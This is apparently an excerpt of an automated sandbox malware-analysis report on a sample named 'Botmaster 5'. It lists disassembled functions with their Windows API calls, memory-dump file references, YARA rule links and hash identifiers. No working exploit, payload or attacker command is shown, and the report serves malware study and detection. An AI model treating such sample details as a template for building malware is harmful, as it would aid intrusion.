                                                                                                                                                                                                                  • Opcode ID: 6de0aa06938f7296dfc33d44c2f7fc694da59e7cf9cc9b0f753a8c643495600e
                                                                                                                                                                                                                  • Instruction ID: 74dbc4216190c1c1bd86e9e6ed04d182e7eb5d36cf83057edfb6f40900b1b500
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6de0aa06938f7296dfc33d44c2f7fc694da59e7cf9cc9b0f753a8c643495600e
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2FD0C9713E4552BADA305625AE05B2225A5A7217D1FA18A32F23BD81F0DFA4E801A61E
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00420BAE Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(00000000,00000001), ref: 00420BD0
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2492992576-0
                                                                                                                                                                                                                  • Opcode ID: 666ff35aa4ae0f6827248eeacba264c0986c18a03534e42af37ef6bdc52c9148
                                                                                                                                                                                                                  • Instruction ID: 7e6058a06ad4f39805c1677079c6ac64e81de5b25898c7c8a12c501e9b8f229f
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 666ff35aa4ae0f6827248eeacba264c0986c18a03534e42af37ef6bdc52c9148
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E3D05230204310EADF612B90ED04B16BEA2BB60B08F40802BF540500F2E6B9A894EA0A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041C4BF Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • CopyFileW.KERNELBASE(0000001E,0000001E,00000000,00404FBB,00000001,00000001,00440B26,0045DF26,00000001,00000000,00000000,0000001E,00000000,00000000,IF_SERIAL,00000057), ref: 0041C4D6
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CopyFile
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1304948518-0
                                                                                                                                                                                                                  • Opcode ID: 46a90c857a42a2d9a60485eb62fed2dca2e398dfa45895d4d52c494b46138dbc
                                                                                                                                                                                                                  • Instruction ID: 5ac3735121d5d68138c67bbe88e84f5dddcf707323a531c85544ab12fab181b7
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46a90c857a42a2d9a60485eb62fed2dca2e398dfa45895d4d52c494b46138dbc
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1AD0C93118C201FE8B206A208D9487BB7E6AB90341F10C83BB495C0820E734C890FB26
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041C720 Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(022D0000,00000008,00000000,00409AA5,00000001,?,00000000,00000000,00000007,0040341A,00000057,00000000,00000000,00000000,00000000,00000000), ref: 0041C731
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                  • Opcode ID: 0e8d687cebcaadad76cd0358ab17b342ff55774f2bd3a2615efeb465b4d5616a
                                                                                                                                                                                                                  • Instruction ID: b5b63cc5849691dd6159a6485232acef874d9acdf93aa034447c397ea4bd3f45
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e8d687cebcaadad76cd0358ab17b342ff55774f2bd3a2615efeb465b4d5616a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37C04CB1B402416BD750DBB89E8AF1772DC7B74706F00C836B656D7154EBB4D810DB29
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004153E0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: fread
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1766058891-0
                                                                                                                                                                                                                  • Opcode ID: f327cb2a9ccf14fd5ef3e0c62aeec2fbef7b02a8d735c08fb3130a95cefaa6a6
                                                                                                                                                                                                                  • Instruction ID: 2cf5e5cf8839d515da2853482da2de940c6da2a5fea5a4f6f51e888bcf47461b
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f327cb2a9ccf14fd5ef3e0c62aeec2fbef7b02a8d735c08fb3130a95cefaa6a6
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48C04CB96143017FE604DB54C8D2D3B73AAEBC8750F808D4CB99846251D675E8548662
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00423451 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • DestroyWindow.USER32(00000000,?), ref: 00423466
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: DestroyWindow
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3375834691-0
                                                                                                                                                                                                                  • Opcode ID: 7cca3b27a5da89e8718106ccf9efe0199dfe9490956044a5cb07223610c638e6
                                                                                                                                                                                                                  • Instruction ID: c061c2067314b3f95cc6d19461152a140ddbf0bee0631a3459794a47d1df82b4
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7cca3b27a5da89e8718106ccf9efe0199dfe9490956044a5cb07223610c638e6
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84C04C716042109A8B026F51EE048167B66BB60705B4140B6E54541075EB759D20EE2E
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004220DC Relevance: 1.5, APIs: 1, Instructions: 7windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000402,?,00000000), ref: 004220ED
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                                                  • Opcode ID: 27d05f580c920ce27a900331f7f4873fe04bcbc28822ad4b6d0ccbe2947d71f6
                                                                                                                                                                                                                  • Instruction ID: cfebb8c4d9f42bdfa07a42995a320e485c7d2ff7f59f91fdc761c799cfa77c19
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27d05f580c920ce27a900331f7f4873fe04bcbc28822ad4b6d0ccbe2947d71f6
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ACC04836244200BFDA019B80CE4AF0ABBA1AB94B00F00C414B384690A086F19824EB0A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041FD24 Relevance: 1.5, APIs: 1, Instructions: 7windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,?), ref: 0041FD35
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                                                  • Opcode ID: 95dcd047eb220b936ea34725a921672a6abeab488616ee965e06257f41c452c7
                                                                                                                                                                                                                  • Instruction ID: 1f3eaf6bd8e74dcced52542329e96fb6968be5da45e80be0ce60d2a9e580ef2e
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95dcd047eb220b936ea34725a921672a6abeab488616ee965e06257f41c452c7
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F3C04836248202ABDA029B50CC45F4ABEB2AB94740F008414F2885A2B0C6B19864DB06
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041C580 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000,00401085,00000000,00001000,00000000,00000000), ref: 0041C589
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CreateHeap
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 10892065-0
                                                                                                                                                                                                                  • Opcode ID: efba2aae8ff84868cfdc71735d32aaaff6644ad04aa3c67d53b7f1535ea8c071
                                                                                                                                                                                                                  • Instruction ID: 7924084de5102533168eca91d8afb4cb488f3991556f120df7b37647b7f7fe99
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: efba2aae8ff84868cfdc71735d32aaaff6644ad04aa3c67d53b7f1535ea8c071
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16B012F068538056E3110B505D46B1036506344B43F100067F640592D4E7F010044B0E
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00415420 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ftell
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 4150084136-0
                                                                                                                                                                                                                  • Opcode ID: 3269e4d6c07d7d802b4a9af4c4e0b51b9df9e0be2daa13651f52e37853aa5dfd
                                                                                                                                                                                                                  • Instruction ID: cf608cb0ffe393b4fe4ab77ab1278bb109e3fd871a38a2e7f0c55e3c8d3ae144
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3269e4d6c07d7d802b4a9af4c4e0b51b9df9e0be2daa13651f52e37853aa5dfd
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BEA022EAC0030023C800A2E0E882C0F328C3A88200FC00828B08882030E23CE008823B
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004154A0 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: fclose
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3125558077-0
                                                                                                                                                                                                                  • Opcode ID: 8832e816e3e9780bfa8dd92a134b0cf0c2dd5fa6bcae1fc0aac3172a8150b1d1
                                                                                                                                                                                                                  • Instruction ID: 85c239afa633d8ed51c36d5b7851f19dd8e18a75a5ef14089c13e07c28dda7a8
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8832e816e3e9780bfa8dd92a134b0cf0c2dd5fa6bcae1fc0aac3172a8150b1d1
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06A024F5C0010013D5045150D40140771541544504FC04414750441010F03DD04CC107
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041C5A0 Relevance: 1.5, APIs: 1, Instructions: 4memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • HeapDestroy.KERNELBASE(022D0000,004048A1,00404828,00000000,Error,Setup Error!,00000010,00000000,00000000,00000000,0046AFD4,0046AFD0,00000000,00000000,00000000,00000000), ref: 0041C5A6
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: DestroyHeap
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2435110975-0
                                                                                                                                                                                                                  • Opcode ID: cb69d0d83d27af621838d040b363139eacc435a6e180e680e489e406d3c5faa2
                                                                                                                                                                                                                  • Instruction ID: 1b500a20cb8840cd224ce718cfbd3e7538084417c7d758ad5acfc50083791b03
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb69d0d83d27af621838d040b363139eacc435a6e180e680e489e406d3c5faa2
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ABA002F1D015809BCF05DBE5EEDCD65776CB74430630814ABF541C2121E6F49848CB1A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00425DF2 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • FreeLibrary.KERNELBASE(00404892,00404828,00000000,Error,Setup Error!,00000010,00000000,00000000,00000000,0046AFD4,0046AFD0,00000000,00000000,00000000,00000000,00000000), ref: 00425DF8
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                                                                  • Opcode ID: 87c423799ed1961ec0b10c125074a25b3167c9963f687a4801e2126364215c45
                                                                                                                                                                                                                  • Instruction ID: 00a54b31d391976233a1b594f91c570e0ff6f1a300bc05ea46af8fcf702cbacd
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 87c423799ed1961ec0b10c125074a25b3167c9963f687a4801e2126364215c45
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 589002314000809BCF015B50EE0D4043B79E7403063004070D04184530A7F10850DE5A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00431900 Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
